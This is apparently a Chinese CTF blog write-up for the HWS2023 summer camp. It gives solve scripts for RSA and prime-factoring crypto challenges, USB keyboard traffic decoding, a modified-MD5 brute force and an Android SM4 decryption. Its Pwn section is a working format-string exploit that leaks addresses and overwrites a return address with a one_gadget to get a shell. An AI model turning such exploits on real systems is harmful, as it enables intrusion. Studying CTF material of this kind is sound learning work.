HWS2023 夏令营

Crypto

RSA

强网杯2022Factor魔改，参考大佬的博客，写的非常细
https://ssst0n3.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/CTF/crypto/%E9%9D%9E%E5%AF%B9%E7%A7%B0%E5%8A%A0%E5%AF%86/RSA/Prime-Power-RSA/%E5%BC%BA%E7%BD%91%E6%9D%AF-Qualifier-2022/Crypto/Factor/%E5%BC%BA%E7%BD%91%E6%9D%AF-Qualifier-2022CryptoFactor-writeup.html
Paper：https://eprint.iacr.org/2015/399.pdf

m1=8334176273377687778925968652923982846998724107624538105654894737480608040787164942908664678429487595866375466955578536932646638608374859799560790357357355475153852315429988251406716837806949387421402107779526648346112857245251481791000156326311794515247012084479404963628187413781724893173183595037984078029706687141452980915897613598715166764006079337996939237831127877822777298891345240992224457502307777453813403723860370336259768714433691700008761598135158249554720239480856332237245140606893060889458298812027643186014638882487288529484407249417947342798261233371859439003556025622531286607093086262182961900221
m2=22291783101991466901669802811072286361463259096412523019927956845014956726984633944311563809077545336731345629003968417408385538540199052480763352937138063001691494078141034164060073208592072783644252721127901996835233091410441838546235477819239598146496144359952946239328842198897348830164467799618269341456666825968971193729838026760012332020223490546511437879465268118749332615890600046622926159177680882780495663448654527562370133394251859961739946007037825763819500955365636946510343942994301809125029616066868596044885547005547390446468651797783520279531291808102209463733268922901056842903640261702268483580079
n2=26989781630503676259502221325791347584607522857769579575297691973258919576768826427059198152035415835627885162613470528107575781277590981314410130242259476764500731263549070841939946410404214950861916808234008589966849302830389937977667872854316531408288338541977868568209278283760692866116947597445559763998608870359453835826711179703215320653445704522573070650642347871171425399227090705774976383452533375854187754721093890020986550939103071021619840797519979671188117673303672023522910200606134989916541289908538417562640981839074992935652363458747488201289997240226553340491203815779083605965873519144351105635977
e2 = 0x10001
c2=15608493359172313429111250362547316415137342033261379619116685637094829328864086722267534755459655689598026363165606700718051739433022581810982230521098576597484850535770518552787220173105513426779515790426303985414120033452747683669501078476628404455341179818932159581239994489678323564587149645006231756392148052557984581049067156468083162932334692086321511063682574943502393749684556026493316348892705114791740287823927634401828970155725090197482067045119003108806888768161101755244340832271562849138340706213702438667804460812804485276133545408754720942940596865774516864097546006862891145251661268265204662316437

def solve2(m1, m2):
    m1 = int(m1)
    m2 = int(m2)
    PR.<x> = PolynomialRing(Zmod(n2))
    f = m1*m2*x-(m2-m1)
    r = 7
    beta = 1/(r+1)
    idx = (r*(r-1)) / ((r+1)*(r+1))
    kbits = int(2048*idx)//2

    from sage.misc.verbose import set_verbose
    set_verbose(2)
    print("---------------LLL debug---------------")
    x = f.monic().small_roots(X=2**kbits, beta=beta)[0]
    set_verbose(0)
    print("-------------------------------------------")
    equ = m1*m2*x-(m2-m1)
    g = gcd(equ, n2)
    p = int(g)^(1/(r-1))
    assert n2%p == 0
    q = n2//p^r
    assert n2%q == 0
    phi = p^(r-1)*(p-1)*(q-1)
    d = inverse_mod(e2, phi)
    m = pow(c2, d, n2)
    return m

b = solve2(m1,m2)
#print(b)
print(bytes.fromhex(hex(b)[2:]))

#flag{RSA_1s_s0_ez_4nd_hwser_c4n_bre4k_1t!}

random

参考https://tttang.com/archive/1504/#toc_3ammadleman-manders-miller-cubic-root-extraction-method
思路是先去爆破这个左移的位数，然后按照题目中生成素数的路子来。用n是否可以整除那个素数来判断是不是正确的素数。

from Crypto.Util.number import *
from gmpy2 import *
from tqdm import *

n = 255550794734774347335455038653204099810524562323968101081052744238324333979282590769066826059535810339765419405089707653972316828518446466787073982991340735273047955757161722774546888128720663627716647123110956021905275918358574092054477588935546729192812379266210918802470144452212508255209922150559524376661512464064852413804511191503030046546647554981646983220695416838829085308878177824361071544916728725428437436959573167863053126718594118224053088660739173865895266537548733106779437480905737491231720771570860988017959907437998012442781279100256862684919251885437194156545435396952798548033193683684362049646718627530076461463826459504520525895649547513376441325848313193080013281816762156916219271109726593135112626577858906494025788770088106285316571255392298608980679161123528759865796345121056864973189231253364595956642612401745212207858555858704724770456899071144650909246822311039572915447866615638976747716646382091135281119109866295649034560378368202797914202112090339159898226929176034503535419893300159083361891627300767030933209665917744361038219820997348160094737332979677839131999258559999565207302339242257832022939036526481610130970477187338439181123984340269665409009894192138483254592729253191096427332283419085864095600303323775372526431524911842065699875575955728772820558157791292247976982470646890930951250598649964200733076634093613078091713383782021194766013790646324780327618195433827227105459480409797466859653960886570869469172506894631937612508518886406112758352094014377947728184352908630672750330561369500089138179794848896959683336195170519521
p_list = []
#for i in tqdm(range(128,256)):
base = 1 << 175
for j in trange(0,500000):
    p = int(next_prime(base + j))
    if n % p == 0:
        #print(f'base={base}\n')
        if p not in p_list:
            p_list.append(p)
            print(f'p={p}')
        
print(p_list)


#base=47890485652059026823698344598447161988085597568237568
'''
p=47890485652059026823698344598447161988085597568251161
p=47890485652059026823698344598447161988085597568297951
p=47890485652059026823698344598447161988085597568338059
p=47890485652059026823698344598447161988085597568363667
p=47890485652059026823698344598447161988085597568398337
p=47890485652059026823698344598447161988085597568433917
p=47890485652059026823698344598447161988085597568484111
p=47890485652059026823698344598447161988085597568667099
p=47890485652059026823698344598447161988085597568729849
'''

用 n % (int(p)**int(j)) 来判断 p 是n 的几次幂，如果余数不为 0 那么循环的j 就是几次幂。将 p_list[i] ** mi[i] 添加到一个新列表，后面添加判断相乘是否为 n。

from threading import Thread
from tqdm import *
from gmpy2 import *


n = 255550794734774347335455038653204099810524562323968101081052744238324333979282590769066826059535810339765419405089707653972316828518446466787073982991340735273047955757161722774546888128720663627716647123110956021905275918358574092054477588935546729192812379266210918802470144452212508255209922150559524376661512464064852413804511191503030046546647554981646983220695416838829085308878177824361071544916728725428437436959573167863053126718594118224053088660739173865895266537548733106779437480905737491231720771570860988017959907437998012442781279100256862684919251885437194156545435396952798548033193683684362049646718627530076461463826459504520525895649547513376441325848313193080013281816762156916219271109726593135112626577858906494025788770088106285316571255392298608980679161123528759865796345121056864973189231253364595956642612401745212207858555858704724770456899071144650909246822311039572915447866615638976747716646382091135281119109866295649034560378368202797914202112090339159898226929176034503535419893300159083361891627300767030933209665917744361038219820997348160094737332979677839131999258559999565207302339242257832022939036526481610130970477187338439181123984340269665409009894192138483254592729253191096427332283419085864095600303323775372526431524911842065699875575955728772820558157791292247976982470646890930951250598649964200733076634093613078091713383782021194766013790646324780327618195433827227105459480409797466859653960886570869469172506894631937612508518886406112758352094014377947728184352908630672750330561369500089138179794848896959683336195170519521
p_list = [47890485652059026823698344598447161988085597568251161, 47890485652059026823698344598447161988085597568297951, 47890485652059026823698344598447161988085597568338059, 47890485652059026823698344598447161988085597568363667, 47890485652059026823698344598447161988085597568398337, 47890485652059026823698344598447161988085597568433917, 47890485652059026823698344598447161988085597568484111, 47890485652059026823698344598447161988085597568667099, 47890485652059026823698344598447161988085597568729849]
mi = []

for p in p_list:
    for j in range(1,6):
        if n % (int(p)**int(j)) != 0:
            print(f'p{p_list.index(p)}的幂为：{j-1}')
            mi.append(j-1)
            break
        elif j==5:
            print(f'p{p_list.index(p)}的幂为：{j}')
            mi.append(j)
            break
print(mi)

check = 1
for i in range(len(mi)):
    check *= p_list[i] ** mi[i]
print(check - n)

最后一部分把 e的公因数 108去除之后，参考文章内容用 sage 的 nth_root 直接开根即可。

from threading import Thread
from tqdm import *
from gmpy2 import *
from functools import reduce
from Crypto.Util.number import *


c = 29259244746260903447574448389058952310000390135231599667104954615635954705912759181552349897154663199516384757779582324312559110410628822220097857204989378367616522573650610718867075518776621505865327181301059226036067398269476892575801933638458560523584293063843890012581096233699743704556897984235725492806550009731913445801481786988321848320254380607620726887530437151238556482879159888862341096974129499878601309077513908335631417136332585391767849651968095851808312565329858938394084369711172343300695636449663297542069122814607488273607842533010193498547579501368165500427762712900139188279259336486273788664239339542187191374015805659616093967428577968683677885747775540903578723024681500272919689849253480672194507905399890280339044782040395397922973935735424691828624724029439840506402735626398047317544972966643810550593849196291833043243448655939654884418027006572740130515844853007135331296523599052132266288322473865775521953742444721612389547052020839760259179074124960827686670217980159612966767064088131176654212504654177367329044762238432531402899949096987765334061101859346928585114984440559379578507872401025874782849854603895110182401204202962118890563473961321104811452539667609870771280348801335004559132482743318366689808669972965573335905879806817618597010442262336079838039317609336210571773187461470707420797827741277982208089496339300646565067740673242728353659143107970717482392927903021102141779217003523105389389513154792904745687959335115429159530013641777064904216646895961910784920181748841104318013067029395394948190384737300533803009402182800702
n = 255550794734774347335455038653204099810524562323968101081052744238324333979282590769066826059535810339765419405089707653972316828518446466787073982991340735273047955757161722774546888128720663627716647123110956021905275918358574092054477588935546729192812379266210918802470144452212508255209922150559524376661512464064852413804511191503030046546647554981646983220695416838829085308878177824361071544916728725428437436959573167863053126718594118224053088660739173865895266537548733106779437480905737491231720771570860988017959907437998012442781279100256862684919251885437194156545435396952798548033193683684362049646718627530076461463826459504520525895649547513376441325848313193080013281816762156916219271109726593135112626577858906494025788770088106285316571255392298608980679161123528759865796345121056864973189231253364595956642612401745212207858555858704724770456899071144650909246822311039572915447866615638976747716646382091135281119109866295649034560378368202797914202112090339159898226929176034503535419893300159083361891627300767030933209665917744361038219820997348160094737332979677839131999258559999565207302339242257832022939036526481610130970477187338439181123984340269665409009894192138483254592729253191096427332283419085864095600303323775372526431524911842065699875575955728772820558157791292247976982470646890930951250598649964200733076634093613078091713383782021194766013790646324780327618195433827227105459480409797466859653960886570869469172506894631937612508518886406112758352094014377947728184352908630672750330561369500089138179794848896959683336195170519521
p_list = [47890485652059026823698344598447161988085597568251161, 47890485652059026823698344598447161988085597568297951, 47890485652059026823698344598447161988085597568338059, 47890485652059026823698344598447161988085597568363667, 47890485652059026823698344598447161988085597568398337, 47890485652059026823698344598447161988085597568433917, 47890485652059026823698344598447161988085597568484111, 47890485652059026823698344598447161988085597568667099, 47890485652059026823698344598447161988085597568729849]
mi = []

for p in p_list:
    for j in range(1,6):
        if n % (int(p)**int(j)) != 0:
            print(f'p{p_list.index(p)}的幂为：{j-1}')
            mi.append(j-1)
            break
        elif j==5:
            print(f'p{p_list.index(p)}的幂为：{j}')
            mi.append(j)
            break
print(mi)

n_list = [p_list[i] ** mi[i] for i in range(len(mi))]
#print(n_list)
print(reduce((lambda x, y: x * y), n_list) - n)

e = 57564

res=[]

for pi in n_list:
    d = inverse(int(e//108),euler_phi(pi))
    m = pow(c,d,pi)
    res.append(Zmod(pi)(m).nth_root(108, all=True))
print(res)

import itertools

for vc in itertools.product(*res):
    _c = [int(x) for x in vc]
    m = long_to_bytes(int(crt(_c, n_list)))
    if b"flag" in m:
        print(m)

#flag{U_ar3_The_K1ng_oF_rand0m_kin9Dom!}

Misc

USB

前面是常规键盘流量分析，后面有点野路子。
tshark -r misc1.pcapng -T fields -e usbhid.data | sed '/^\s*$/d' > usbdata.txt

f=open('usbdata.txt','r')
fi=open('out.txt','w')
while 1:
   a=f.readline().strip()
   if a:
       if len(a)== 16: # 鼠标流量的话 len 改为 8
          out=''
          for i in range(0,len(a),2):
              if i+2 != len(a):
                  out+=a[i]+a[i+1]+":"
              else:
                 out+=a[i]+a[i+1]
          fi.write(out)
          fi.write('\n')
   else:
       break
fi.close()

发现导出的数据第一列有异常，部分为20，常见的键盘流量分析题目，均为00 01 02等类型，遂手动将第一列的20改为02即可

normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
              "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
              "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
              "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
              "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
              "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
              "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
 
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
             "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
             "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
             "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
             "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
             "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
             "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
             "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
keys = open('out.txt') #这里是加号冒号的数据
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()
 
flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output))

赛博厨子直接梭

flag{ec1b8b96-56a9-f15c-4e39-503e92ab45d2}

Pwn

fmt

from mypwn import *

sla(b"I need a str: ",'EXIT\r%18$p%19$p%21$p')

ru('0x')
ret_addr = leak() - 8
logs(ret_addr)
ru('0x')
elf.address = leak() - 28 - 0x13c6
logs(elf.address)
ru('0x')
libc.address = leak() - 243 - libc.symbols['__libc_start_main']
logs(libc.address)

one = libc.address + 0xe3b01

payload = b'%8c%8$hhnAAAAAAA' + p64(ret_addr)
sla(b"I need other str: ",payload)

ret_addr += 16
one1 = one & 0xffff
one2 = (one>>16)&0xffff
#dbg()
payload = b'EXIT\r%' + str(one1-5).encode() + b'c%9$hn'
payload = payload.ljust(0x18,b'A')
payload += p64(ret_addr)
sla(b"I need a str: ",payload)
payload = b'%' + str(one2).encode() + b'c%9$hn'
payload = payload.ljust(0x18,b'A')
payload += p64(ret_addr + 2)
sla(b"I need other str: ",payload)

shell()

Reverse

Animals

程序加了很多花指令，使用idapython进行去花。
修复完成后所有程序爆红，在这里更改成全部都是主函数范围内，并记录结束地址：406DA8
发现MD5函数，跟进去发现这里MD5的码表被转换了，1和2交换，3和4交换，所以，改写md5.c文件。

#include <memory.h>
#include "md5.h"
 
unsigned char PADDING[]={0x80,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
                         
void MD5Init(MD5_CTX *context)
{
     context->count[0] = 0;
     context->count[1] = 0;
     context->state[0] = 0xEFCDAB89;
     context->state[1] = 0x67452301;
     context->state[2] = 0x10325476;
     context->state[3] = 0x98BADCFE;
}
void MD5Update(MD5_CTX *context,unsigned char *input,unsigned int inputlen)
{
    unsigned int i = 0,index = 0,partlen = 0;
    index = (context->count[0] >> 3) & 0x3F;
    partlen = 64 - index;
    context->count[0] += inputlen << 3;
    if(context->count[0] < (inputlen << 3))
       context->count[1]++;
    context->count[1] += inputlen >> 29;
    
    if(inputlen >= partlen)
    {
       memcpy(&context->buffer[index],input,partlen);
       MD5Transform(context->state,context->buffer);
       for(i = partlen;i+64 <= inputlen;i+=64)
           MD5Transform(context->state,&input[i]);
       index = 0;        
    }  
    else
    {
        i = 0;
    }
    memcpy(&context->buffer[index],&input[i],inputlen-i);
}
void MD5Final(MD5_CTX *context,unsigned char digest[16])
{
    unsigned int index = 0,padlen = 0;
    unsigned char bits[8];
    index = (context->count[0] >> 3) & 0x3F;
    padlen = (index < 56)?(56-index):(120-index);
    MD5Encode(bits,context->count,8);
    MD5Update(context,PADDING,padlen);
    MD5Update(context,bits,8);
    MD5Encode(digest,context->state,16);
}
void MD5Encode(unsigned char *output,unsigned int *input,unsigned int len)
{
    unsigned int i = 0,j = 0;
    while(j < len)
    {
         output[j] = input[i] & 0xFF;  
         output[j+1] = (input[i] >> 8) & 0xFF;
         output[j+2] = (input[i] >> 16) & 0xFF;
         output[j+3] = (input[i] >> 24) & 0xFF;
         i++;
         j+=4;
    }
}
void MD5Decode(unsigned int *output,unsigned char *input,unsigned int len)
{
     unsigned int i = 0,j = 0;
     while(j < len)
     {
           output[i] = (input[j]) |
                       (input[j+1] << 8) |
                       (input[j+2] << 16) |
                       (input[j+3] << 24);
           i++;
           j+=4; 
     }
}
void MD5Transform(unsigned int state[4],unsigned char block[64])
{
     unsigned int a = state[0];
     unsigned int b = state[1];
     unsigned int c = state[2];
     unsigned int d = state[3];
     unsigned int x[64];
     MD5Decode(x,block,64);
     FF(a, b, c, d, x[ 0], 7, 0xd76aa478); /* 1 */
 FF(d, a, b, c, x[ 1], 12, 0xe8c7b756); /* 2 */
 FF(c, d, a, b, x[ 2], 17, 0x242070db); /* 3 */
 FF(b, c, d, a, x[ 3], 22, 0xc1bdceee); /* 4 */
 FF(a, b, c, d, x[ 4], 7, 0xf57c0faf); /* 5 */
 FF(d, a, b, c, x[ 5], 12, 0x4787c62a); /* 6 */
 FF(c, d, a, b, x[ 6], 17, 0xa8304613); /* 7 */
 FF(b, c, d, a, x[ 7], 22, 0xfd469501); /* 8 */
 FF(a, b, c, d, x[ 8], 7, 0x698098d8); /* 9 */
 FF(d, a, b, c, x[ 9], 12, 0x8b44f7af); /* 10 */
 FF(c, d, a, b, x[10], 17, 0xffff5bb1); /* 11 */
 FF(b, c, d, a, x[11], 22, 0x895cd7be); /* 12 */
 FF(a, b, c, d, x[12], 7, 0x6b901122); /* 13 */
 FF(d, a, b, c, x[13], 12, 0xfd987193); /* 14 */
 FF(c, d, a, b, x[14], 17, 0xa679438e); /* 15 */
 FF(b, c, d, a, x[15], 22, 0x49b40821); /* 16 */
 
 /* Round 2 */
 GG(a, b, c, d, x[ 1], 5, 0xf61e2562); /* 17 */
 GG(d, a, b, c, x[ 6], 9, 0xc040b340); /* 18 */
 GG(c, d, a, b, x[11], 14, 0x265e5a51); /* 19 */
 GG(b, c, d, a, x[ 0], 20, 0xe9b6c7aa); /* 20 */
 GG(a, b, c, d, x[ 5], 5, 0xd62f105d); /* 21 */
 GG(d, a, b, c, x[10], 9,  0x2441453); /* 22 */
 GG(c, d, a, b, x[15], 14, 0xd8a1e681); /* 23 */
 GG(b, c, d, a, x[ 4], 20, 0xe7d3fbc8); /* 24 */
 GG(a, b, c, d, x[ 9], 5, 0x21e1cde6); /* 25 */
 GG(d, a, b, c, x[14], 9, 0xc33707d6); /* 26 */
 GG(c, d, a, b, x[ 3], 14, 0xf4d50d87); /* 27 */
 GG(b, c, d, a, x[ 8], 20, 0x455a14ed); /* 28 */
 GG(a, b, c, d, x[13], 5, 0xa9e3e905); /* 29 */
 GG(d, a, b, c, x[ 2], 9, 0xfcefa3f8); /* 30 */
 GG(c, d, a, b, x[ 7], 14, 0x676f02d9); /* 31 */
 GG(b, c, d, a, x[12], 20, 0x8d2a4c8a); /* 32 */
 
 /* Round 3 */
 HH(a, b, c, d, x[ 5], 4, 0xfffa3942); /* 33 */
 HH(d, a, b, c, x[ 8], 11, 0x8771f681); /* 34 */
 HH(c, d, a, b, x[11], 16, 0x6d9d6122); /* 35 */
 HH(b, c, d, a, x[14], 23, 0xfde5380c); /* 36 */
 HH(a, b, c, d, x[ 1], 4, 0xa4beea44); /* 37 */
 HH(d, a, b, c, x[ 4], 11, 0x4bdecfa9); /* 38 */
 HH(c, d, a, b, x[ 7], 16, 0xf6bb4b60); /* 39 */
 HH(b, c, d, a, x[10], 23, 0xbebfbc70); /* 40 */
 HH(a, b, c, d, x[13], 4, 0x289b7ec6); /* 41 */
 HH(d, a, b, c, x[ 0], 11, 0xeaa127fa); /* 42 */
 HH(c, d, a, b, x[ 3], 16, 0xd4ef3085); /* 43 */
 HH(b, c, d, a, x[ 6], 23,  0x4881d05); /* 44 */
 HH(a, b, c, d, x[ 9], 4, 0xd9d4d039); /* 45 */
 HH(d, a, b, c, x[12], 11, 0xe6db99e5); /* 46 */
 HH(c, d, a, b, x[15], 16, 0x1fa27cf8); /* 47 */
 HH(b, c, d, a, x[ 2], 23, 0xc4ac5665); /* 48 */
 
 /* Round 4 */
 II(a, b, c, d, x[ 0], 6, 0xf4292244); /* 49 */
 II(d, a, b, c, x[ 7], 10, 0x432aff97); /* 50 */
 II(c, d, a, b, x[14], 15, 0xab9423a7); /* 51 */
 II(b, c, d, a, x[ 5], 21, 0xfc93a039); /* 52 */
 II(a, b, c, d, x[12], 6, 0x655b59c3); /* 53 */
 II(d, a, b, c, x[ 3], 10, 0x8f0ccc92); /* 54 */
 II(c, d, a, b, x[10], 15, 0xffeff47d); /* 55 */
 II(b, c, d, a, x[ 1], 21, 0x85845dd1); /* 56 */
 II(a, b, c, d, x[ 8], 6, 0x6fa87e4f); /* 57 */
 II(d, a, b, c, x[15], 10, 0xfe2ce6e0); /* 58 */
 II(c, d, a, b, x[ 6], 15, 0xa3014314); /* 59 */
 II(b, c, d, a, x[13], 21, 0x4e0811a1); /* 60 */
 II(a, b, c, d, x[ 4], 6, 0xf7537e82); /* 61 */
 II(d, a, b, c, x[11], 10, 0xbd3af235); /* 62 */
 II(c, d, a, b, x[ 2], 15, 0x2ad7d2bb); /* 63 */
 II(b, c, d, a, x[ 9], 21, 0xeb86d391); /* 64 */
     state[0] += a;
     state[1] += b;
     state[2] += c;
     state[3] += d;
}

这里对加密结果进行了处理，调试发现他加密的结果就是我们选择的动物的全称，比如说我们选择1则加密dog。所以程序逻辑就是用动物名字加密，然后变异的md5加密后和密文比较，如果比较成功就是对的动物名字，用这个名字的序号再加密md5，最后写exp爆破。

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <time.h>
#include <windows.h>
#include<stdio.h>
#include <stdio.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <windows.h>
#include <string.h>
#include<md5.c>
#include <stdio.h>
#include <stdbool.h>
#include <windows.h>

using namespace std;
typedef int status;
typedef int selemtype;
char choices[][10] = {
    "cat",
    "dog",
    "fox",
    "panda",
    "dragon",
    "monkey"
};
unsigned char answer[] = {
    0xCB, 0xA4, 0x7B, 0xE5, 0xF0, 0x1C, 0xD1, 0x95, 0x5C, 0x85,
    0x46, 0xA2, 0xB2, 0x4F, 0xBD, 0x18
};
int main () {
    MD5_CTX md5;
    unsigned char md5_str[32]={0};
    int length = 9;  

    int choice[length]; 

    
    for (int i = 0; i < length; i++) {
        choice[i] = 0;
    }

    while (1) {
        char animalName[length * 10 + 1];  
        int index = 0;
        for (int i = 0; i < length; i++) {
            int choiceIndex = choice[i];
            char *animal = choices[choiceIndex];
            while (*animal != '\0') {
                animalName[index] = *animal;
                animal++;
                index++;
            }
        }
        animalName[index] = '\0';
        for(int i = 0 ; i < 16 ; i ++ )
        {
            md5_str[i]=0;
        }
        MD5Init(&md5);
        MD5Update(&md5, (unsigned char *)animalName, strlen((char *)animalName));
        MD5Final(&md5, (unsigned char *)md5_str);
        for (int i = 0 ; i < 16 ; i ++ ) {
            md5_str[i] = (md5_str[i] & 0xE9 | ~md5_str[i] & 0x16);
        }
        for(int i = 0 ; i < 16 ; i ++ )
        {
            if(md5_str[i]!=answer[i])
            {
                break;
            }
            if(i>5)
            {
                printf("%s",animalName);
                return 0;
            }
        }
            
        
        int i = length - 1;
        while (i >= 0 && choice[i] == 5) {
            choice[i] = 0;
            i--;
        }
        if (i < 0) {
            break;
        }
        choice[i]++;
    }

    return 0;
}


//catmonkeydogdragondogcatfoxpandapanda
//051410233

找出相应序号然后md5加密套上flag{}即可
flag{839c998c52db6618bb24c346b85a894f}

Android

用jadx分析无果，解压去分析so层文件，在libjniex.so发现decrypt函数

跟进去发现为SM4密码，并发现密文。

装不了模拟器，手机安装运行APK文件即可看到key:159762dr7vh438saiv:1313131313131313

赛博厨子直接SM4解密就可以。

CTF > Write Up

#Write Up

HWS2023 夏令营

https://g1at.github.io/2023/08/04/HWSsummer2023/

作者

g0at

发布于

2023年8月4日

许可协议

MQTT协议上一篇

DCIC2023 下一篇